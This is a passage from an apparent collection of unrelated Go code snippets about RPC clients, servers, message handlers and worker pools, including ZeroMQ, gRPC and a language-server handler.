{\n\t\t\tfmt.Printf(\"Failed to send complex pong: %v\", err)\n\t\t}\n\t})\n\truntime.Goexit()\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\tgob.Register(MapJob{})\n\tgob.Register(ReduceJob{})\n\tsockname := coordinatorSock()\n\tc, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\n\tfmt.Println(err)\n\treturn false\n}", "func setUpRPC(nodeRPC string) {\n\trpcServ := new(Service)\n\trpc.Register(rpcServ)\n\trpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\tif err != nil {\n\t\tlog.Fatal(\"listen error:\", err)\n\t}\n\tl, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\tfor i := 0; i >= 0; i++ {\n\t\tconn, _ := l.AcceptTCP()\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t\tgo rpc.ServeConn(conn)\n\t\tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t\tcolorprint.Alert(\"=========================================================================================\")\n\t\tdefer conn.Close()\n\t}\n\tl.Close()\n\n\t// rpcServ := new(FTService)\n\t// rpc.Register(rpcServ)\n\t// rpcAddr, err := net.ResolveTCPAddr(\"tcp\", nodeRPC)\n\t// if err != nil {\n\t// \tlog.Fatal(\"listen error:\", err)\n\t// }\n\t// l, e := net.ListenTCP(consts.TransProtocol, rpcAddr)\n\t// if e != nil {\n\t// \tlog.Fatal(\"listen error:\", e)\n\t// }\n\t// for i := 0; i >= 0; i++ {\n\t// \tconn, _ := l.AcceptTCP()\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \tcolorprint.Debug(\"REQ \" + strconv.Itoa(i) + \": ESTABLISHING RPC REQUEST CONNECTION WITH \" + conn.LocalAddr().String())\n\t// \trpc.ServeConn(conn)\n\t// \tcolorprint.Blue(\"REQ \" + strconv.Itoa(i) + \": Request Served\")\n\t// \tcolorprint.Alert(\"=========================================================================================\")\n\t// \t//defer conn.Close()\n\t// }\n\t// l.Close()\n\n}", "func workerTask() {\n\tworker, err := zmq4.NewSocket(zmq4.REQ)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"ipc://backend.ipc\")\n\tworker.SendMessage(WorkerReady)\n\n\tfor {\n\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Fatalln(err)\n\t\t}\n\n\t\tmsg[len(msg)-1] = \"OK\"\n\t\tworker.SendMessage(msg)\n\t}\n\n}", "func caller(msgType int) MyReply {\n\targs := MyArgs{}\n\targs.MessageType = msgType\n\treply := MyReply{}\n\tcall(\"Master.Handler\", &args, &reply)\n\n\treturn reply\n}", "func main() {\n\thttp.HandleFunc(\"/api/backend\", handler.HandleBackendCall)\n\thttp.HandleFunc(\"/api/schema\", handler.HandleSchemaCall)\n\thttp.HandleFunc(\"/api/redirect\", handler.HandleRedirectCall)\n\thttp.HandleFunc(\"/api/add\", handler.HandleAddCall)\n\tfmt.Println(\"Waiting...\")\n\thttp.ListenAndServe(\":8080\", nil)\n\n}", "func (client *Client) Do(funcname string, data []byte, flag byte) (handle string, err error) {\n var datatype uint32\n if flag & JOB_LOW == JOB_LOW {\n if flag & JOB_BG == JOB_BG {\n datatype = common.SUBMIT_JOB_LOW_BG\n } else {\n datatype = common.SUBMIT_JOB_LOW\n }\n } else if flag & JOB_HIGH == JOB_HIGH {\n if flag & JOB_BG == JOB_BG {\n datatype = common.SUBMIT_JOB_HIGH_BG\n } else {\n datatype = common.SUBMIT_JOB_HIGH\n }\n } else if flag & JOB_BG == JOB_BG {\n datatype = common.SUBMIT_JOB_BG\n } else {\n datatype = common.SUBMIT_JOB\n }\n\n uid := strconv.Itoa(int(client.ai.Id()))\n l := len(funcname) + len(uid) + len(data) + 2\n rel := make([]byte, 0, l)\n rel = append(rel, []byte(funcname)...) // len(funcname)\n rel = append(rel, '\\x00') // 1 Byte\n rel = append(rel, []byte(uid)...) // len(uid)\n rel = append(rel, '\\x00') // 1 Byte\n rel = append(rel, data...) // len(data)\n client.writeJob(newJob(common.REQ, datatype, rel))\n // Waiting for JOB_CREATED\n select {\n case job := <-client.jobCreated:\n return string(job.Data), nil\n case <-time.After(client.TimeOut):\n return \"\", common.ErrJobTimeOut\n }\n return\n}", "func main() {\n\tgoworker.Register(\"SampleAddJobClass\", addWorker)\n\n\tif err := goworker.Work(); err != nil {\n\t\tfmt.Println(\"Error:\", err)\n\t}\n\n}", "func main() {\n\n\twait := make(chan struct{}, 0)\n\tRegisterCallback(\"ping\", pingCB())\n\tRegisterCallback(\"add\", addCB())\n\tRegisterErrorCallback(\"raiseError\", err)\n\tRegisterValue(\"wasmVal\", \"Hello World\")\n\n\t<-wait\n}", "func main() {\n\n\tcfg := webhook.LoadConfiguration(\"./config/\")\n\tqueue := webhook.NewMessagingQueue(cfg.QueueURI, cfg.ExchangeName, cfg.PoolConfig)\n\thook := webhook.NewWebHook(queue)\n\n\tiris.Post(\"/\" + cfg.EndpointName, hook.Process)\n\tgo cleanup(queue)\n\n\tiris.Listen(fmt.Sprintf(\":%d\", cfg.WebServerPort))\n\n}", "func main() {\n\n\tif (len(os.Args) != 4 && len(os.Args) != 5) {\n\t\tErrorCommandArguments()\n\t\treturn\n\t}\n\n\tgrpcHostname := os.Args[1]\n\n\tgrpcPort := os.Args[2]\n\n\n\tc, conn := CreateGrpcConnection(grpcHostname, grpcPort)\n\tdefer conn.Close()\n\n\tmodeChoice := os.Args[3]\n\tvar response *grpc_health.Message\n\n\tvar err error \n\tswitch modeChoice {\n\n\tcase \"sayhello\":\n\t\tresponse, err = c.SayHello(context.Background(), &grpc_health.Message{Body: \"Hello From Client! I'll wait for your reply!!!\"})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling SayHello or SayBonjour: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Response from server: %s\", response.Body)\n\t\n\tcase \"clusterhealth\":\n\t\tvar clusterinfo *grpc_health.ClusterInfo\n\t\tclusterinfo, err = c.GetClusterStatus(context.Background(), &grpc_health.Message{Body: \"Asking Cluster status\"})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling GetClusterStatus: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Cluster name: %s\", clusterinfo.Name)\n\t\tlog.Printf(\"Cluster status: %s\", clusterinfo.Status)\n\t\tlog.Printf(\"Cluster nb nodes: %s\", clusterinfo.Nodes)\n\t\n\tcase \"indexhealth\":\n\t\tif (len(os.Args) != 5) {\n\t\t\tErrorCommandArguments()\n\t\t\treturn\n\t\t} \n\t\t\n\t\tindiceName := os.Args[4]\n\t\tvar indiceInfo *grpc_health.IndiceInfo\n\t\tindiceInfo, err = c.GetIndiceStatus(context.Background(), &grpc_health.IndiceName{Indicename: indiceName})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling GetClusterStatus: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Response from server:\")\n\t\tlog.Printf(\"Indice name: %s\", indiceInfo.Indicename)\n\t\tlog.Printf(\"Indice status: %s\", indiceInfo.Status)\n\t\tlog.Printf(\"Indice health: %s\", indiceInfo.Health)\n\t\tlog.Printf(\"Indice uuid: %s\", indiceInfo.Uuid)\n\t\n\tcase \"listindices\":\n\t\tvar listIndices *grpc_health.ListIndices\n\t\tlistIndices, err = c.GetIndicesList(context.Background(), &grpc_health.Message{Body: \"Hello From Client! I'll wait for your reply!!!\"})\n\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when calling GetIndicesList: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Nb indices : %s\", listIndices.NbIndices)\n\n\t\tnbIndices, err := strconv.Atoi(listIndices.NbIndices)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when converting number of indices: %s\", err)\n\t\t}\n\n\t\tvar indiceInfo *grpc_health.IndiceInfo\n\t\tfor i := 0; i < nbIndices; i++ {\n\t\t\tindiceInfo = listIndices.Indicelist[i]\n\t\t\tlog.Printf(\"Index [ %s ] - Status : %s - Health : %s - Uuid : %s \", indiceInfo.Indicename, indiceInfo.Status, indiceInfo.Health, indiceInfo.Uuid)\n\t\t}\n\t\n\tcase \"createindex\":\n\t\tif (len(os.Args) != 5) {\n\t\t\tErrorCommandArguments()\n\t\t\treturn\n\t\t} \n\t\tindiceName := os.Args[4]\n\t\tresponse, err = c.CreateIndexInCluster(context.Background(), &grpc_health.IndiceName{Indicename: indiceName})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Create index request response : %s\", err)\n\t\t}\n\t\tlog.Printf(\"Create index request succeeded. %s\", response.Body)\n\n\tcase \"deleteindex\":\n\t\tif (len(os.Args) != 5) {\n\t\t\tErrorCommandArguments()\n\t\t\treturn\n\t\t} \n\t\t\n\t\tindiceName := os.Args[4]\n\t\tresponse, err = c.DeleteIndexInCluster(context.Background(), &grpc_health.IndiceName{Indicename: indiceName})\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Error when deleting index in Cluster: %s\", err)\n\t\t}\n\t\tlog.Printf(\"Delete index request response : %s\", response.Body)\n\t\n\tdefault:\n\t\tErrorCommandArguments()\n\t\treturn\n\n\t}\n\n}", "func main() {\n\tcalculix := serverCalculix.NewCalculix()\n\terr := rpc.Register(calculix)\n\tif err != nil {\n\t\tfmt.Println(\"Cannot register the calculix\")\n\t\treturn\n\t}\n\trpc.HandleHTTP()\n\tl, e := net.Listen(\"tcp\", \":1234\")\n\tif e != nil {\n\t\tlog.Fatal(\"listen error:\", e)\n\t}\n\terr = http.Serve(l, nil)\n\tif err != nil {\n\t\tfmt.Println(\"Cannot serve the calculix\")\n\t\treturn\n\t}\n}", "func call(rpcname string, args interface{}, reply interface{}) bool {\n\t// c, err := rpc.DialHTTP(\"tcp\", \"127.0.0.1\"+\":1234\")\n\tsockname := masterSock()\n\tc, err := rpc.DialHTTP(\"unix\", sockname)\n\tif err != nil {\n\t\tlog.Fatal(\"dialing:\", err)\n\t}\n\tdefer c.Close()\n\t//远程调用Master.Example(args, reply)\n\terr = c.Call(rpcname, args, reply)\n\tif err == nil {\n\t\treturn true\n\t}\n\tfmt.Println(err)\n\treturn false\n}", "func CallRpc(addr string, rid uint16, sendFun, recvFun func(*common.NetPack)) {\n\tbuf := common.NewNetPackCap(64)\n\tbuf.SetOpCode(rid)\n\tsendFun(buf)\n\tb := PostReq(addr+\"client_rpc\", buf.DataPtr)\n\tif recvFun != nil {\n\t\tb2 := common.Decompress(b)\n\t\trecvFun(common.NewNetPack(b2))\n\t}\n}", "func worker() {\n\tworker, err := zmq4.NewSocket(zmq4.DEALER)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\tdefer worker.Close()\n\tworker.Connect(\"inproc://backend\")\n\n\tfor {\n\t\tmsg, err := worker.RecvMessage(0)\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\tid, content := pop(msg)\n\n\t\treplies := rand.Intn(5)\n\t\tfor reply := 0; reply < replies; reply++ {\n\t\t\ttime.Sleep(time.Duration(rand.Intn(1000)+1) * time.Millisecond)\n\t\t\tworker.SendMessage(id, content)\n\t\t}\n\t}\n}", "func main() {\n\thandler := pb.NewHelloWorldServer(&HelloWorldServer{}, nil)\n\t// You can use any mux you like - NewHelloWorldServer gives you an http.Handler.\n\tmux := http.NewServeMux()\n\t// The generated code includes a const, <ServiceName>PathPrefix, which\n\t// can be used to mount your service on a mux.\n\tmux.Handle(pb.HelloWorldPathPrefix, handler)\n\thttp.ListenAndServe(\":8080\", mux)\n}", "func main() {\n\tctx := context.Background()\n\tctx, cancel := context.WithCancel(ctx)\n\tdefer cancel()\n\n\t// New server multiplexer\n\tmux := runtime.NewServeMux()\n\topts := []grpc.DialOption{grpc.WithInsecure()}\n\n\t// Our gRPC host address\n\tconn := os.Getenv(\"SERVICE_ADDRESS\")\n\tapiAddress := os.Getenv(\"API_ADDRESS\")\n\n\tlog.Printf(\"Connecting to gRPC server on: %s\\n\", conn)\n\tlog.Printf(\"Starting API on: %s\\n\", apiAddress)\n\n\t// Register the handler to an endpoint\n\terr := gw.RegisterUserServiceHandlerFromEndpoint(ctx, mux, conn, opts)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Return a server instance\n\thttp.ListenAndServe(apiAddress, mux)\n}", "func fire(worker string, rpcname string, args interface{}, reply interface{}, group *sync.WaitGroup, registerChan chan string) {\n\tres := call(worker, rpcname, args, reply)\n\tif res {\n\t\tgroup.Done()\n\t\tregisterChan <- worker\n\t} else {\n\t\tworker := <- registerChan\n\t\tfire(worker, rpcname, args, reply, group, registerChan)\n\t}\n}", "func ExampleWorkers_basic() {\n\n\tworkerFn := func(ctx context.Context, inpRec interface{}, sender SenderFn, store WorkerStore) error {\n\t\tv, ok := inpRec.(string)\n\t\tif !ok {\n\t\t\treturn errors.New(\"incorrect input type\")\n\t\t}\n\t\t// do something with v\n\t\tres := strings.ToUpper(v)\n\n\t\t// send response\n\t\treturn sender(res)\n\t}\n\n\tp := New(8, workerFn) // create workers pool\n\tcursor, err := p.Go(context.Background())\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\t// send some records in\n\tgo func() {\n\t\tp.Submit(\"rec1\")\n\t\tp.Submit(\"rec2\")\n\t\tp.Submit(\"rec3\")\n\t\tp.Close() // all records sent\n\t}()\n\n\t// consume results\n\trecs, err := cursor.All(context.TODO())\n\tlog.Printf(\"%+v, %v\", recs, err)\n}", "func main() {\n\tadder := &Adder{0}\n\n\t// Reset the counter every 30 seconds\n\tgo func() {\n\t\tc := time.Tick(30 * time.Second)\n\t\tfor _ = range c {\n\t\t\tadder.Reset()\n\t\t}\n\t}()\n\n\t// register our adder (adds the exposed methods)\n\t// set the http server to use /rpc as the websocket endpoint\n\trpc.Register(adder)\n\thttp.Handle(\"/rpc\", websocket.Handler(func(ws *websocket.Conn) {\n\t\tjsonrpc.ServeConn(ws)\n\t}))\n\n\t// Serve static files\n\thttp.Handle(\"/\", http.FileServer(http.Dir(\".\")))\n\terr := http.ListenAndServe(\":12345\", nil)\n\tif err != nil {\n\t\tpanic(\"ListenAndServe: \" + err.Error())\n\t}\n}", "func svcHandler()", "func (c *Connection) Worker() {\n\n\tfor {\n\t\tselect {\n\t\tcase _ = <-c.workerctx.Done():\n\t\t\treturn\n\t\tcase inData := <-c.In:\n\t\t\theader, _ := wire.GetHeader(inData)\n\n\t\t\tif header.CmdType == wire.CMD_EXIT {\n\t\t\t\tos.Exit(0)\n\t\t\t}\n\n\t\t\tlogg.Debug(\"processing server cmd\")\n\n\t\t\tcmdFunc, ok := cmd.CommandBuffer[header.CmdType]\n\t\t\tif !ok {\n\t\t\t\tlogg.Log(\"Command not implemented\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t\tnewctx1, _ := context.WithCancel(c.workerctx)\n\t\t\tgo cmdFunc(inData, c.Out, newctx1)\n\t\t}\n\t}\n\n}", "func (h *Handler) handle(method string, params *json.RawMessage) (res interface{}, err error) {\n\tstart := time.Now()\n\tlog.Debug(\"Received %s message\", method)\n\tdefer func() {\n\t\tif r := recover(); r != nil {\n\t\t\tlog.Error(\"Panic in handler for %s: %s\", method, r)\n\t\t\tlog.Debug(\"%s\\n%v\", r, string(debug.Stack()))\n\t\t\terr = &jsonrpc2.Error{\n\t\t\t\tCode: jsonrpc2.CodeInternalError,\n\t\t\t\tMessage: fmt.Sprintf(\"%s\", r),\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Debug(\"Handled %s message in %s\", method, time.Since(start))\n\t\t}\n\t}()\n\n\tswitch method {\n\tcase \"initialize\":\n\t\tinitializeParams := &lsp.InitializeParams{}\n\t\tif err := json.Unmarshal(*params, initializeParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.initialize(initializeParams)\n\tcase \"initialized\":\n\t\t// Not doing anything here. Unsure right now what this is really for.\n\t\treturn nil, nil\n\tcase \"shutdown\":\n\t\treturn nil, nil\n\tcase \"exit\":\n\t\t// exit is a request to terminate the process. We do this preferably by shutting\n\t\t// down the RPC connection but if we can't we just die.\n\t\tif h.Conn != nil {\n\t\t\tif err := h.Conn.Close(); err != nil {\n\t\t\t\tlog.Fatalf(\"Failed to close connection: %s\", err)\n\t\t\t}\n\t\t} else {\n\t\t\tlog.Fatalf(\"No active connection to shut down\")\n\t\t}\n\t\treturn nil, nil\n\tcase \"textDocument/didOpen\":\n\t\tdidOpenParams := &lsp.DidOpenTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didOpenParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didOpen(didOpenParams)\n\tcase \"textDocument/didChange\":\n\t\tdidChangeParams := &lsp.DidChangeTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didChangeParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didChange(didChangeParams)\n\tcase \"textDocument/didSave\":\n\t\tdidSaveParams := &lsp.DidSaveTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didSaveParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didSave(didSaveParams)\n\tcase \"textDocument/didClose\":\n\t\tdidCloseParams := &lsp.DidCloseTextDocumentParams{}\n\t\tif err := json.Unmarshal(*params, didCloseParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn nil, h.didClose(didCloseParams)\n\tcase \"textDocument/formatting\":\n\t\tformattingParams := &lsp.DocumentFormattingParams{}\n\t\tif err := json.Unmarshal(*params, formattingParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.formatting(formattingParams)\n\tcase \"textDocument/completion\":\n\t\tcompletionParams := &lsp.CompletionParams{}\n\t\tif err := json.Unmarshal(*params, completionParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.completion(completionParams)\n\tcase \"textDocument/documentSymbol\":\n\t\tsymbolParams := &lsp.DocumentSymbolParams{}\n\t\tif err := json.Unmarshal(*params, symbolParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.symbols(symbolParams)\n\tcase \"textDocument/declaration\":\n\t\tfallthrough\n\tcase \"textDocument/definition\":\n\t\tpositionParams := &lsp.TextDocumentPositionParams{}\n\t\tif err := json.Unmarshal(*params, positionParams); err != nil {\n\t\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeInvalidParams}\n\t\t}\n\t\treturn h.definition(positionParams)\n\tdefault:\n\t\treturn nil, &jsonrpc2.Error{Code: jsonrpc2.CodeMethodNotFound}\n\t}\n}", "func handlerRunner(msgHandler *mtypeInfo, conn net.Conn, data []byte) {\n\tstart := time.Now()\n\t// Run the handler for this message type.\n\tmsgHandler.handler(conn, data)\n\t// Update statistics for this message type.\n\tmsgHandler.statsLock.Lock()\n\tmsgHandler.stats.TotRuntime += time.Since(start)\n\tmsgHandler.stats.NrCalls += 1\n\tmsgHandler.stats.AveRuntime = msgHandler.stats.TotRuntime / time.Duration(msgHandler.stats.NrCalls)\n\tmsgHandler.statsLock.Unlock()\n}", "func main() {\n\t// Listen an actual port.\n\tlis, err := net.Listen(\"tcp\", fmt.Sprintf(\":%d\", 9093))\n\tif err != nil {\n\t\tlog.Fatalf(\"failed to listen: %v\", err)\n\t}\n\tdefer lis.Close()\n\n\t// Create a HTTP server for prometheus.\n\thttpServer := &http.Server{Handler: promhttp.HandlerFor(reg, promhttp.HandlerOpts{}), Addr: fmt.Sprintf(\"0.0.0.0:%d\", 9092)}\n\n\t// Create a gRPC Server with gRPC interceptor.\n\tgrpcServer := grpc.NewServer(\n\t\tgrpc.StreamInterceptor(grpcMetrics.StreamServerInterceptor()),\n\t\tgrpc.UnaryInterceptor(grpcMetrics.UnaryServerInterceptor()),\n\t)\n\n\t// Create a new api server.\n\tdemoServer := newDemoServer()\n\n\t// Register your service.\n\tpb.RegisterDemoServiceServer(grpcServer, demoServer)\n\n\t// Initialize all metrics.\n\tgrpcMetrics.InitializeMetrics(grpcServer)\n\n\t// Start your http server for prometheus.\n\tgo func() {\n\t\tif err := httpServer.ListenAndServe(); err != nil {\n\t\t\tlog.Fatal(\"Unable to start a http server.\")\n\t\t}\n\t}()\n\n\t// Start your gRPC server.\n\tlog.Fatal(grpcServer.Serve(lis))\n}", "func (c *MainChannelCC) Invoke(stub shim.ChaincodeStubInterface) pb.Response {\n funcName, args := stub.GetFunctionAndParameters()\n\n switch funcName {\n // 任务上传\n case \"requestUpload\":\n return requestUpload(stub, args)\n // 查询任务\n case \"requestQuery\":\n return requestQuery(stub, args)\n // 查询全部任务\n case \"requestQueryArr\":\n return requestQueryArr(stub, args)\n // 难度值上传\n case \"difficultyUpload\":\n return difficultyUpload(stub, args)\n // 难度值查询\n case \"difficultyQuery\":\n return difficultyQuery(stub, args)\n // 难度值统一查询\n case \"difficultyQueryArr\":\n return difficultyQueryArr(stub, args)\n // 判断胜利者\n case \"winnerUpload\":\n return winnerUpload(stub, args)\n // 查询胜利者\n case \"winnerQuery\":\n return winnerQuery(stub, args)\n // 查询全部胜利者\n case \"winnerQueryArr\":\n return winnerQueryArr(stub, args)\n // 子channel上传\n case \"subChannelUpload\":\n return subChannelUpload(stub, args)\n // 子channel查询\n case \"subChannelQuery\":\n return subChannelQuery(stub, args)\n // 数据上传\n case \"dataUpload\":\n return dataUpload(stub, args)\n // 查询数据\n case \"dataQuery\":\n return dataQuery(stub, args)\n // 数据统一查询\n case \"dataQueryArr\":\n return dataQueryArr(stub, args)\n // 奖励发放\n case \"rewardsUpload\":\n return rewardsUpload(stub, args)\n // 奖励获取\n case \"rewardsReceive\":\n return rewardsReceive(stub, args)\n }\n\n\treturn shim.Success(nil)\n}", "func rpc_call(reqMethod string, reqParam interface{}, ip string, port int) Node {\n\n\ttempClient, _ := jsonrpc.Dial(serverInfo1.Protocol, ip+\":\"+strconv.Itoa(port))\n\tdefer tempClient.Close()\n\tvar resp Node\n\terr := tempClient.Call(\"DICT3.\"+reqMethod, reqParam, &resp)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn Node{}\n\t}\n\treturn resp\n}", "func (c *app) handle(msg message) {\n\tswitch msg := msg.(type) {\n\n\tcase *challenge:\n\t\tgo c.handleChallenge(msg)\n\t\treturn\n\n\tcase *event:\n\t\tfor _, x := range c.domains {\n\t\t\tx.subLock.RLock()\n\t\t\tif binding, ok := x.subscriptions[msg.Subscription]; ok {\n\t\t\t\tx.subLock.RUnlock()\n\t\t\t\tDebug(\"Event %s (%d)\", binding.endpoint, binding.callback)\n\t\t\t\tgo x.handlePublish(msg, binding)\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tx.subLock.RUnlock()\n\t\t\t}\n\t\t}\n\n\t\t// We can't be delivered to a sub we don't have... right?\n\t\tWarn(\"No handler registered for subscription:\", msg.Subscription)\n\n\tcase *invocation:\n\t\tfor _, x := range c.domains {\n\t\t\tx.regLock.RLock()\n\t\t\tif binding, ok := x.registrations[msg.Registration]; ok {\n\t\t\t\tx.regLock.RUnlock()\n\t\t\t\tDebug(\"Invoking %s (%d)\", binding.endpoint, binding.callback)\n\t\t\t\tgo x.handleInvocation(msg, binding)\n\t\t\t\treturn\n\t\t\t} else {\n\t\t\t\tx.regLock.RUnlock()\n\t\t\t}\n\t\t}\n\n\t\ts := fmt.Sprintf(\"no handler for registration: %v\", msg.Registration)\n\t\tWarn(s)\n\n\t\tm := &errorMessage{\n\t\t\tType: iNVOCATION,\n\t\t\tRequest: msg.Request,\n\t\t\tDetails: make(map[string]interface{}),\n\t\t\tError: ErrNoSuchRegistration,\n\t\t}\n\n\t\tc.Queue(m)\n\n\t// Handle call results seperately to account for progressive calls\n\tcase *result:\n\t\t// If this is a progress call call the handler, do not alert the listener\n\t\t// Listener is only updated once the call completes\n\t\tif p, ok := msg.Details[\"progress\"]; ok {\n\t\t\tx := p.(bool)\n\t\t\tif x {\n\t\t\t\tfor _, x := range c.domains {\n\t\t\t\t\tif binding, ok := x.handlers[msg.Request]; ok {\n\t\t\t\t\t\tDebug(\"Result %s (%d)\", binding.endpoint, binding.callback)\n\t\t\t\t\t\tgo x.handleResult(msg, binding)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tc.findListener(msg)\n\t\t}\n\n\tcase *welcome:\n\t\tDebug(\"Received WELCOME, reestablishing state with the fabric\")\n\t\tc.open = true\n\t\tc.SetState(Ready)\n\n\t\t// Reset retry delay after successful connection.\n\t\tc.retryDelay = initialRetryDelay\n\n\t\tgo c.replayRegistrations()\n\t\tgo c.replaySubscriptions()\n\n\tcase *goodbye:\n\t\tc.Connection.Close(\"Fabric said goodbye. Closing connection\")\n\n\tdefault:\n\t\tc.findListener(msg)\n\t}\n}", "func (r *rpcClientService) Call(serviceMethod string, args interface{},\n reply interface{}) error {\n\n if r == nil {\n return fmt.Errorf(\"error in rpc: client is nil\")\n }\n if r.rpcCh == nil {\n return fmt.Errorf(\"error in rpc client setup: channel is nil\")\n }\n buf, errJSON := json.Marshal(args)\n if errJSON != nil {\n glog.Error(\"error in marshaling args:: \", errJSON)\n return fmt.Errorf(\"error in marshaling args:: %v\", errJSON)\n }\n\n replyCh := make(chan *httpRPCRsp)\n state := sendRPCState{Method: serviceMethod, Args: buf, ReplyCh: replyCh}\n\n // send it on the rpc channel to the startClient loop\n glog.V(2).Info(\"sending rpc on channel: \", serviceMethod)\n\n select {\n case r.rpcCh <- &state:\n glog.V(2).Info(\"queued rpc call\")\n case <-r.stopCh:\n glog.V(2).Info(\"abandoning rpc call\")\n return ErrClient\n }\n\n // Now block on the response channel. Timeouts are implemented per request\n // in the client so we do not need to check for timeouts here.\n var rsp *httpRPCRsp\n select {\n case rsp = <-replyCh:\n glog.V(2).Infof(\"received response for rpc Call\")\n case <-r.stopCh:\n glog.V(2).Info(\"abandoning rpc call after sending\")\n return ErrDisconnect\n }\n\n // This can happen when stopCh gets closed due to connection errors.\n if rsp == nil {\n glog.Error(\"error in rpc response\")\n reply = nil\n return ErrDisconnect\n }\n if rsp.Status != nil {\n return rsp.Status\n }\n glog.V(1).Infof(\"rpc response succeeded with size: %d\", len(rsp.Reply))\n glog.V(3).Infof(\"rpc response reply: %+v, size: %d\", rsp.Reply,\n len(rsp.Reply))\n // success, let's unmarshal\n errRsp := json.Unmarshal(rsp.Reply, reply)\n if errRsp != nil {\n glog.Error(\"error unmarshaling RPC reply: \", errRsp)\n return errRsp\n }\n return nil\n}", "func (rpc *rpcHandler) Handler(w http.ResponseWriter, r *http.Request) {\n\n\tif r.Method == \"OPTIONS\" {\n\t\thelper.ServeCORS(w, r)\n\t\treturn\n\t}\n\n\tif r.Method != \"POST\" {\n\t\thttp.Error(w, \"Method not allowed\", http.StatusMethodNotAllowed)\n\t\treturn\n\t}\n\tdefer r.Body.Close()\n\n\tbadRequest := func(description string) {\n\t\te := errors.BadRequest(\"stack.rpc\", description)\n\t\tw.WriteHeader(400)\n\t\tw.Write([]byte(e.Error()))\n\t}\n\n\tvar service, endpoint, address string\n\tvar request interface{}\n\n\t// response content type\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\n\tct := r.Header.Get(\"Content-Type\")\n\n\t// Strip charset from Content-Type (like `application/json; charset=UTF-8`)\n\tif idx := strings.IndexRune(ct, ';'); idx >= 0 {\n\t\tct = ct[:idx]\n\t}\n\n\tswitch ct {\n\tcase \"application/json\":\n\t\tvar rpcReq rpcRequest\n\n\t\td := json.NewDecoder(r.Body)\n\t\td.UseNumber()\n\n\t\tif err := d.Decode(&rpcReq); err != nil {\n\t\t\tbadRequest(err.Error())\n\t\t\treturn\n\t\t}\n\n\t\tservice = rpcReq.Service\n\t\tendpoint = rpcReq.Endpoint\n\t\taddress = rpcReq.Address\n\t\trequest = rpcReq.Request\n\t\tif len(endpoint) == 0 {\n\t\t\tendpoint = rpcReq.Method\n\t\t}\n\n\t\t// JSON as string\n\t\tif req, ok := rpcReq.Request.(string); ok {\n\t\t\td := json.NewDecoder(strings.NewReader(req))\n\t\t\td.UseNumber()\n\n\t\t\tif err := d.Decode(&request); err != nil {\n\t\t\t\tbadRequest(\"error decoding request string: \" + err.Error())\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\tdefault:\n\t\tr.ParseForm()\n\t\tservice = r.Form.Get(\"service\")\n\t\tendpoint = r.Form.Get(\"endpoint\")\n\t\taddress = r.Form.Get(\"address\")\n\t\tif len(endpoint) == 0 {\n\t\t\tendpoint = r.Form.Get(\"method\")\n\t\t}\n\n\t\td := json.NewDecoder(strings.NewReader(r.Form.Get(\"request\")))\n\t\td.UseNumber()\n\n\t\tif err := 